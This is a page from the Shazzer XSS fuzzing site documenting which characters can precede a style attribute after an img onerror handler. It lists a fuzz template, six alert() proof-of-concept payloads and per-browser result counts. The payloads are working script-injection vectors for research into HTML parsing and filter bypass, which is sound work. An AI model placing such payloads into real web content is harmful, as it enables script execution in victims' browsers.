Shazzer logo
Login

Chars allowed before style attribute...

Chrome logo 6
Firefox logo 6
Edge logo 6
Safari logo 6

This XSS vector shows what characters can be used before the onerror event.

t0xodile
Created byt0xodile
Created Oct 25, 2025
Updated Oct 25, 2025

Tweet
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<img src onerror=log($[i])$[chr]style=display:block;content-visibility:auto>

Sample payloads

<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>
<img src onerror=alert(10)
style=display:block;content-visibility:auto>
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>
<img src onerror=alert(32) style=display:block;content-visibility:auto>
<img src onerror=alert(62)>style=display:block;content-visibility:auto>

Fuzz results

Chrome logo
Chrome 145.0.0.0 desktop macOS 10.15.7
Updated8 Feb 2026
Found 6 results
Loading...
Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0older version
Updated8 Feb 2026
Found 6 results
Loading...
Chrome logo
Chrome 139.0.0.0 desktop Linux Unknownolder version
Updated25 Oct 2025
Found 6 results
Loading...
Firefox logo
Firefox 148.0 desktop Windows NT 10.0
Updated16 Feb 2026
Found 6 results
Loading...
Firefox logo
Firefox 147.0 desktop macOS 10.15older version
Updated25 Jan 2026
Found 6 results
Loading...
Edge logo
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated16 Feb 2026
Found 6 results
Loading...
Safari logo
Safari 26.2 mobile iOS 18.7
Updated29 Jan 2026
Found 6 results
Loading...
Safari logo
Safari 17.2 mobile iOS 17.2.1older version
Updated29 Jan 2026
Found 6 results
Loading...

Distributed Fuzzing

Enabled:
Status:disconnected
Your browser automatically contributes to distributed fuzzing when idle.